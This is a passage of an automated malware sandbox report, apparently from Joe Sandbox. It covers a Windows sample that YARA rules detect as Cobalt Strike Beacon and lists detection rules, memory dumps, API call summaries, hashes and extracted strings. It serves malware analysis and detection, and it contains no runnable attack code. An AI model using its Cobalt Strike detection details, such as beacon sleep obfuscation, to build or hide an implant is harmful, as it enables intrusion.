                                                                          • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2073190217.0000000002068000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2073190217.0000000002068000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000003.2073190217.0000000002068000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000003.2073190217.0000000002068000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000003.2073190217.0000000002068000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.3315812932.00000000020A0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
Reputation: low
Has exited: false

                                                                            Execution Graph

Execution Coverage: 0.3%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 28.9%
Total number of Nodes: 218
Total number of Limit Nodes: 31

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Object$Font$CreateDeleteIndirect$lstrcpy$InfoSystem$EnumFamiliesParametersStock$CapsCharsetDeviceMetricsTextWindow
                                                                            • String ID: Arial$MS Sans Serif$Marlett$Segoe UI$Tahoma
                                                                            • API String ID: 1948770699-1395034203
                                                                            • Opcode ID: c56c575decf0d09262d632f7c37735480c17fdc26898bc6c9f0f7bc4366ace97
                                                                            • Instruction ID: 68dedb83c74c12985681789053b3080d52f262c267dbe6659b6e850852debccd
                                                                            • Opcode Fuzzy Hash: c56c575decf0d09262d632f7c37735480c17fdc26898bc6c9f0f7bc4366ace97
                                                                            • Instruction Fuzzy Hash: 1B02C036204B8196EB56EF22E4587DA77A1F78DB80F44412AEB4A477B4DFBCC949C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Color$BrushCreate$Solid$CapsDevicePattern
                                                                            • String ID:
                                                                            • API String ID: 3066057030-0
                                                                            • Opcode ID: 55e63baadf1953b7b357c020304154dc6c912f1b5b46dea6436ebc6df18dbf04
                                                                            • Instruction ID: 25b3ba93feb23922009906762e9c7d5486f4d693ac2e51633c3e63fed6e34798
                                                                            • Opcode Fuzzy Hash: 55e63baadf1953b7b357c020304154dc6c912f1b5b46dea6436ebc6df18dbf04
                                                                            • Instruction Fuzzy Hash: E1E1373A60064097E74AAF32D9587DE77A2FB4DB91F044139AB4B476B1EF78D468CB00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
                                                                            • String ID:
                                                                            • API String ID: 2667261700-0
                                                                            • Opcode ID: b9cc029e578b55f4e71bfb0e2601f201283755def9b7ca961f0f7ef1f16749c0
                                                                            • Instruction ID: 52120ccb9b4ab4cb6d756ac4511413edec13ee11dbb2109200b8ad32074023fa
                                                                            • Opcode Fuzzy Hash: b9cc029e578b55f4e71bfb0e2601f201283755def9b7ca961f0f7ef1f16749c0
                                                                            • Instruction Fuzzy Hash: 704181B574068487EE2ECF1691587AA63A2F78CB80F144525DBAE577A1DF78D451C300
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MetricsSystem$CapsDevice
                                                                            • String ID:
                                                                            • API String ID: 4163108049-0
                                                                            • Opcode ID: 78a9545ec0c6638fe582392515822ea47f35c0b82a01e3525930a47a7f0cc018
                                                                            • Instruction ID: ab783497ddf3bae56904748af8978ee9f3d3dba7f91fbe07d742f7c1491047e7
                                                                            • Opcode Fuzzy Hash: 78a9545ec0c6638fe582392515822ea47f35c0b82a01e3525930a47a7f0cc018
                                                                            • Instruction Fuzzy Hash: 47014476A0074097EB099F72E95C75A7662FB4CB61F048039CB4A8B7E0DFBD84958B40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$Profile$EnterInitializeLeave
                                                                            • String ID: DragDelay$DragMinDist$windows
                                                                            • API String ID: 2203521320-2101198082
                                                                            • Opcode ID: 4157cd7e166909cd92d70fd4e1914eaeaffffb8f63f7fc1f91c9f83ed929f74d
                                                                            • Instruction ID: 04705c67083e3ff8b3d64257ca15be663ad568148be5ec33844b7af3041e434b
                                                                            • Opcode Fuzzy Hash: 4157cd7e166909cd92d70fd4e1914eaeaffffb8f63f7fc1f91c9f83ed929f74d
                                                                            • Instruction Fuzzy Hash: 31114C72511B019FF7229F26E448B9937A5F31873AF420628CB68062F5DBBCC589CB41
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • VerSetConditionMask.KERNEL32 ref: 0000000140075163
                                                                            • VerSetConditionMask.KERNEL32 ref: 0000000140075174
                                                                            • VerifyVersionInfoW.KERNEL32 ref: 0000000140075187
                                                                            • GetSystemMetrics.USER32 ref: 0000000140075198
                                                                              • Part of subcall function 0000000140075E0C: GetSysColor.USER32 ref: 0000000140075E2D
                                                                              • Part of subcall function 0000000140075E0C: GetSysColor.USER32 ref: 0000000140075E44
                                                                              • Part of subcall function 0000000140075E0C: GetSysColor.USER32 ref: 0000000140075E5F
                                                                              • Part of subcall function 0000000140075E0C: GetSysColor.USER32 ref: 0000000140075E6B
                                                                              • Part of subcall function 0000000140075E0C: GetDeviceCaps.GDI32 ref: 0000000140075E9B
                                                                              • Part of subcall function 0000000140075E0C: GetSysColor.USER32 ref: 0000000140075EA9
                                                                              • Part of subcall function 0000000140075E0C: GetSysColor.USER32 ref: 0000000140075EBC
                                                                              • Part of subcall function 0000000140075E0C: GetSysColor.USER32 ref: 0000000140075ECB
                                                                              • Part of subcall function 0000000140075E0C: GetSysColor.USER32 ref: 0000000140075EDA
                                                                              • Part of subcall function 0000000140075E0C: GetSysColor.USER32 ref: 0000000140075EE9
                                                                              • Part of subcall function 0000000140075E0C: GetSysColor.USER32 ref: 0000000140075EF8
                                                                              • Part of subcall function 0000000140075E0C: GetSysColor.USER32 ref: 0000000140075F07
                                                                              • Part of subcall function 0000000140075E0C: GetSysColor.USER32 ref: 0000000140075F13
                                                                              • Part of subcall function 0000000140075E0C: GetSysColor.USER32 ref: 0000000140075F1F
                                                                              • Part of subcall function 0000000140075E0C: GetSysColor.USER32 ref: 0000000140075F2B
                                                                              • Part of subcall function 0000000140075E0C: GetSysColor.USER32 ref: 0000000140075F37
                                                                              • Part of subcall function 0000000140075E0C: GetSysColor.USER32 ref: 0000000140075F46
                                                                              • Part of subcall function 0000000140075E0C: GetSysColor.USER32 ref: 0000000140075F52
                                                                              • Part of subcall function 0000000140075E0C: GetSysColor.USER32 ref: 0000000140075F61
                                                                              • Part of subcall function 0000000140075E0C: GetSysColor.USER32 ref: 0000000140075F70
                                                                              • Part of subcall function 0000000140075E0C: GetSysColor.USER32 ref: 0000000140075F7F
                                                                              • Part of subcall function 0000000140075E0C: GetSysColor.USER32 ref: 0000000140075F8E
                                                                              • Part of subcall function 0000000140075E0C: GetSysColor.USER32 ref: 0000000140075F9D
                                                                              • Part of subcall function 00000001400757A8: GetDeviceCaps.GDI32 ref: 0000000140075806
                                                                              • Part of subcall function 00000001400757A8: DeleteObject.GDI32 ref: 0000000140075873
                                                                              • Part of subcall function 00000001400757A8: DeleteObject.GDI32 ref: 0000000140075896
                                                                              • Part of subcall function 00000001400757A8: DeleteObject.GDI32 ref: 00000001400758B9
                                                                              • Part of subcall function 00000001400757A8: DeleteObject.GDI32 ref: 00000001400758DC
                                                                              • Part of subcall function 00000001400757A8: DeleteObject.GDI32 ref: 00000001400758FF
                                                                              • Part of subcall function 00000001400757A8: DeleteObject.GDI32 ref: 0000000140075923
                                                                              • Part of subcall function 000000014007521C: GetSystemMetrics.USER32 ref: 000000014007523A
                                                                              • Part of subcall function 000000014007521C: GetSystemMetrics.USER32 ref: 000000014007524B
                                                                              • Part of subcall function 000000014007521C: SetRectEmpty.USER32 ref: 0000000140075261
                                                                              • Part of subcall function 000000014007521C: EnumDisplayMonitors.USER32 ref: 0000000140075275
                                                                              • Part of subcall function 000000014007521C: SystemParametersInfoW.USER32 ref: 000000014007528A
                                                                              • Part of subcall function 000000014007521C: SystemParametersInfoW.USER32 ref: 00000001400752C1
                                                                              • Part of subcall function 000000014007521C: SystemParametersInfoW.USER32 ref: 00000001400752D9
                                                                              • Part of subcall function 000000014007521C: SystemParametersInfoW.USER32 ref: 0000000140075304
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Color$System$DeleteObject$Info$Parameters$Metrics$CapsConditionDeviceMask$DisplayEmptyEnumMonitorsRectVerifyVersion
                                                                            • String ID:
                                                                            • API String ID: 1661573292-0
                                                                            • Opcode ID: a6258f1061695804a294fa076e17b982e36a98ca024d76928b001b8c9824c9c5
                                                                            • Instruction ID: 897f60ca80ca6558607a8615851971d28442fb53aade3046c9004bb5af628607
                                                                            • Opcode Fuzzy Hash: a6258f1061695804a294fa076e17b982e36a98ca024d76928b001b8c9824c9c5
                                                                            • Instruction Fuzzy Hash: EF115E3560468082FB26AF72E81D3DA7791E78CB89F440034DB4A4B7A5DFBDC1458B40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MetricsObjectSelectText$ExceptionThrowWindow
                                                                            • String ID:
                                                                            • API String ID: 926127490-0
                                                                            • Opcode ID: e00aaebd14f2e999bcfcc72b2db4893e414e9740bb0caa8c9e6f81096da117de
                                                                            • Instruction ID: 00ed161b9ddd1ee363df6d59b6d6070b80523c0eaf78e8d6c2fedbb0c6e568c2
                                                                            • Opcode Fuzzy Hash: e00aaebd14f2e999bcfcc72b2db4893e414e9740bb0caa8c9e6f81096da117de
                                                                            • Instruction Fuzzy Hash: 9C312732701A80ABEB09DF6AD8943DD7370F788794F410126EB2A977A9DF34CA15C740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Color$MetricsSystem$BrushCapsCursorDeviceLoad
                                                                            • String ID:
                                                                            • API String ID: 3232524254-0
                                                                            • Opcode ID: dafa7c0bc3d4399581d4628cf608d9d229f3049ac6f4cc6ac7259ffa0f0857d8
                                                                            • Instruction ID: febbf4cd23352729bd1d5e9ac2533448d5a92182838231a72feb886e90666ee3
                                                                            • Opcode Fuzzy Hash: dafa7c0bc3d4399581d4628cf608d9d229f3049ac6f4cc6ac7259ffa0f0857d8
                                                                            • Instruction Fuzzy Hash: 60F03072A00B0487E71A9F35E00A76E27A2F70CB08F100138DA494A3D9DFBDC4558380
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 288 1401ed10c-1401ed11b 289 1401ed11d-1401ed129 288->289 290 1401ed12b-1401ed13b 288->290 289->290 291 1401ed16e-1401ed179 call 1401d8728 289->291 292 1401ed152-1401ed16a RtlAllocateHeap 290->292 297 1401ed17b-1401ed180 291->297 293 1401ed13d-1401ed144 call 1401ec58c 292->293 294 1401ed16c 292->294 293->291 300 1401ed146-1401ed150 call 1401f93fc 293->300 294->297 300->291 300->292
                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(?,?,00000000,00000001401F1406,?,?,?,00000001401D8731,?,?,?,?,00000001401ED2A2,?,?,00000000), ref: 00000001401ED161
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 1279760036-0
                                                                            • Opcode ID: 662f149e2cc767e93f5299b8001a9bccfa184fc0b5ea85232da4f3914bc0e9eb
                                                                            • Instruction ID: d3488c8105fd979a18f19eb53cd6b0e1b69393b12be7f08a94183d0ea2284044
                                                                            • Opcode Fuzzy Hash: 662f149e2cc767e93f5299b8001a9bccfa184fc0b5ea85232da4f3914bc0e9eb
                                                                            • Instruction Fuzzy Hash: 33F09A7430220481FE6B67A399513EE22865F8DFA0F4C54304F0A863F2DE3CCC818290
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: _invalid_parameter_noinfo$ConsoleCreateCtrlCurrentHandlerInstanceThread_com_issue_error
                                                                            • String ID: %d - %s$%s$/applydefs$/apstate$/displaylastscanresult$/displaylastscantime$/displaylocaldefversion$/displaysdkversion$/displayvipreversion$/enableap$/enablefw$/nr$/scanfile$/scannowfull$/scannowquick$/updatedefs$CServerConnection::SynchronizeConnectionState$Disabled$ERROR:Could not set control handler$ERROR:Couldn't access AP controller$ERROR:Couldn't access VIPRE interface$ERROR:Couldn't access service interface$ERROR:Couldn't access threat definition interface$ERROR:Couldn't get VIPRE version$ERROR:Couldn't get current local threat definitions version$ERROR:Couldn't get current product version$ERROR:Couldn't start a threat definition update$ERROR:Unexpected number of parameters : %d$Enabled$Failed to get the ServerConnection instance.$SBAM.Common
                                                                            • API String ID: 983190622-1673929483
                                                                            • Opcode ID: 2175e76c8966e9e2c91432a9e9c153b8283cf491260df2ab5baf2bdf7b3f79df
                                                                            • Instruction ID: e2ccf87b5099f0f7b934bda8e5f3f9185fd1f49f832c8f2bd04db4d19a08eeb6
                                                                            • Opcode Fuzzy Hash: 2175e76c8966e9e2c91432a9e9c153b8283cf491260df2ab5baf2bdf7b3f79df
                                                                            • Instruction Fuzzy Hash: C3B2BFB2214A4182EB62EF27F4547EE73A1FB89B95F804012FB4A972B5DF78C945C740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy_s$_invalid_parameter_noinfo
                                                                            • String ID:
                                                                            • API String ID: 2880407647-0
                                                                            • Opcode ID: ac3efb290208e8ae0aa939dd7ccb27a44b6dea8bf0587a3634350ef81f9eea52
                                                                            • Instruction ID: d55e0586a353003d38fd01ccca46069b0816c393a8d43c12287e66a16324f9fb
                                                                            • Opcode Fuzzy Hash: ac3efb290208e8ae0aa939dd7ccb27a44b6dea8bf0587a3634350ef81f9eea52
                                                                            • Instruction Fuzzy Hash: 9103A3722002C18BD776DE26E940BE937E6F79CB8CF441129DB066BBA9D734DA45CB40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Object$CreateSelect$Color$BitmapCompatible$BrushPixelSolid
                                                                            • String ID:
                                                                            • API String ID: 3358463585-3916222277
                                                                            • Opcode ID: 1df8b1d2eb40a2e4c64d6f9953f07afc6d8e6ddda128a5a288f14fc75fc205f1
                                                                            • Instruction ID: 36a310155856242cf22ac8df365cc62708b8248cfa66fc5bdf7cbf623e4e9850
                                                                            • Opcode Fuzzy Hash: 1df8b1d2eb40a2e4c64d6f9953f07afc6d8e6ddda128a5a288f14fc75fc205f1
                                                                            • Instruction Fuzzy Hash: 57B14836B00A409AE711DFA2E4447DE77B2F78D798F410225AF4A67BA9DF78C909C704
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Menu$Append$CountItem$Window$MessageSend$std::ios_base::~ios_base
                                                                            • String ID:
                                                                            • API String ID: 3077673360-0
                                                                            • Opcode ID: 1609092b61a251d599070388332eed870609b53ab1e186e3f12fea724001bc05
                                                                            • Instruction ID: 593342c414d0840502a905506aa168c8c238ab7ad9b31de17f1f977baee00964
                                                                            • Opcode Fuzzy Hash: 1609092b61a251d599070388332eed870609b53ab1e186e3f12fea724001bc05
                                                                            • Instruction Fuzzy Hash: B4226D76304A4181EA56DB67E5653EE23A1FB8DBC0F484026EF4A87BB6DF78C845C740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Similarity
                                                                            • API ID: MessageSend$ParentState$ClientCursorScreenWindow
                                                                            • String ID: @
                                                                            • API String ID: 1877249070-2766056989
                                                                            • Opcode ID: 8ee0b49f7d9925462ddefdc57ec641247ea191f704512888dfabb0780fe64466
                                                                            • Instruction ID: 140cad35568e94f452ad0275af3b7fffb49309a9d8d4eaa39f9df7672e3ed6a8
                                                                            • Opcode Fuzzy Hash: 8ee0b49f7d9925462ddefdc57ec641247ea191f704512888dfabb0780fe64466
                                                                            • Instruction Fuzzy Hash: 78E1AB36604A8082EB26DFA6E4447EA63B1FB8ABD4F044225EF5A177F1DF38C655C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Message$Send$Beep
                                                                            • String ID:
                                                                            • API String ID: 877464050-0
                                                                            • Opcode ID: 6641b13dfa4fa58008cad89c09aeb1b98cc96b389eb434e9f60f319105532cac
                                                                            • Instruction ID: 28ceacd0c0eed99e254be9da9112040e60a409c879e384fdc2aa0697006f248c
                                                                            • Opcode Fuzzy Hash: 6641b13dfa4fa58008cad89c09aeb1b98cc96b389eb434e9f60f319105532cac
                                                                            • Instruction Fuzzy Hash: 7102CC32700A5586EB26DF66D844BEE2362F788BC8F600522EF0E57BA5DF79C945C340
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Capture$Message$Window$RectRelease$Dispatch$CursorInflateInvalidatePeekSendShowUpdate
                                                                            • String ID:
                                                                            • API String ID: 3442015766-0
                                                                            • Opcode ID: d20c489f634d74416a7611dc0b6d08c35d34bd75ea5450a69a6b5875957c9e90
                                                                            • Instruction ID: 86ef2b047a16d48c46ba655c4d43d2274012e181eba7e8355bcf87f9e1ea2742
                                                                            • Opcode Fuzzy Hash: d20c489f634d74416a7611dc0b6d08c35d34bd75ea5450a69a6b5875957c9e90
                                                                            • Instruction Fuzzy Hash: 1EC1933670464096FF17DB37D4647EA67A1AB8CBC8F084529AF0A4BBB5EEB8C445D340
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Similarity
